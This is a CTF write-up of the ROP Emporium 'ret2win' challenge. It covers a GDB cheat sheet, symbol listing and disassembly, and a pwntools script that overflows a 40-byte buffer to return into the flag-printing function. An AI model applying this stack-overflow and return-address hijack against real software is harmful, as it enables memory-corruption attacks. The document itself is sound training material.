ROP Emporium Pt. 1: ret2win

SPOILER WARNING: This page will contain potential spoilers, so consider that before continuing ROP Emporium is a collection of challenges designed to teach return-oriented programming (ROP) techniques by slowly introducing new concepts and increasing difficulty. If you're looking for a spoiler-free guide, check out the one included on their website. Thanks to advice from @netspooky on Mastodon, I installed GDB with GEF and Ropper to get started. I also made use of their cheat sheet of GDB commands that they very kindly guided me to: ─────────────────────────────────────────────────────────────────────────────── [ gdb ] - Can run or attach to a program currently running on Linux - If you're new to gdb, use gef! - Here are some basic commands to get you started: $ gdb --args ./myprogram -f myfile -- Start the program with arguments gef> starti -- Start at the first instruction gef> stepi -- Step 1 assembly instruction gef> break *0x400000 -- Set a breakpoint on address 0x400000 gef> continue -- Continue execution, will stop at breakpoints gef> vmmap -- Check memory map gef> hexdump byte --size 256 0x400000 -- See a hex dump of bytes at a address 0x400000 gef> p *object -- Show details of object gef> search-pattern 0x41414141 -- Search for bytes \x41\x41\x41\x41 ("AAAA") in memory More Info: ─────────────────────────────────────────────────────────────────────────────── The first step in solving this is to simply read through the page for the challenge, as it includes some good information. I found two hints to be particularly notable, the first being that “typically you'll need 40 bytes of garbage to reach the saved return address in the x86_64 binaries, 44 bytes in the x86 binaries and around 36 bytes in the ARMv5 & MIPS binaries”. For context, this means giving the program a string of text N characters long before the payload in order to cause a buffer overflow and starting writing into the return address. This same vulnerability is used across all of the challenges on ROP Emporium. By doing this, you can modify the program flow, which is the foundation of Return-Oriented Programming. The second was that you can “find out how many bytes you have to construct your chain ... using `$ ltrace ` and looking at the call to `read()`.” Doing this gives us 56 bytes, which with the garbage characters, leaves 16 bytes for a chain. Now I'll start actually poking around at the binary. I used this nm one-liner to list out the symbols in the file, filtering for only the text section of data. Similar can be done with 'strings', or 'rabin2 -i'. nm ────────────────────────────────────────── $ nm ./ret2win | grep " t " 00000000004005f0 t deregister_tm_clones 0000000000400660 t __do_global_dtors_aux 0000000000400690 t frame_dummy 00000000004006e8 t pwnme 0000000000400620 t register_tm_clones 0000000000400756 t ret2win ────────────────────────────────────────── Two symbols stand out here, which are pwnme (at 0x4006e8) and ret2win (at 0x400756). By disassembling both, we can see that pwnme is the name of the vulnerable function taking user input, and ret2win is the function printing out the flag. The goal is to overflow pwnme and jump to ret2win. radare ─────────────────────────────────────────────────────────────────────────────── [0x004006e8]> 0x400756 [0x00400756]> pdf ;-- rip: ┌ 27: sym.ret2win (); │ 0x00400756 55 push rbp │ 0x00400757 4889e5 mov rbp, rsp │ 0x0040075a bf26094000 mov edi, │ str.Well_done__Heres_your_flag: │ ; 0x400926 ; "Well done! Here's │ your flag:" ; const char *s │ 0x0040075f e8ecfdffff call sym.imp.puts │ 0x00400764 bf43094000 mov edi, str._bin_cat_flag.txt │ ; 0x400943 ; "/bin/cat flag.txt" │ 0x00400769 e8f2fdffff call sym.imp.system │ 0x0040076e 90 nop │ 0x0040076f 5d pop rbp └ 0x00400770 c3 ret ─────────────────────────────────────────────────────────────────────────────── Learning from the pwntools wiki (a Python library recommended by the Beginners' Guide), I threw together the beginning of a script to interact with the binary. ─────────────────────────── from pwn import * p = process('./ret2win') payload = b'A' * 40 p.sendline(payload) ─────────────────────────── I also learned that pwntools offers yet another way to dump symbols from the executable. It's not necessary in any capacity for this challenge but it makes it possible to do some fun stuff. ──────────────────────────────────────────────────── e = ELF('./ret2win') context(arch='amd64', os='linux', endian='little') print(e.symbols) ──────────────────────────────────────────────────── This allows, not only referencing hard-coded symbols but, also looking things up at runtime and referencing them in a slightly more abstract way. For example, 'e.symbols['ret2win']', instead of 0x400756. Here's one final solution that exemplifies both possible routes. ──────────────────────────────────────────────────── from pwn import * p = process('./ret2win') e = ELF('./ret2win') context(arch='amd64', os='linux', endian='little') payload = b'A' * 40 # Hardcoded # payload += p64(0x400756) # Dynamic payload += p64(e.symbols['ret2win']) print(payload) p.sendline(payload) ──────────────────────────────────────────────────── See part 2 for more. // END //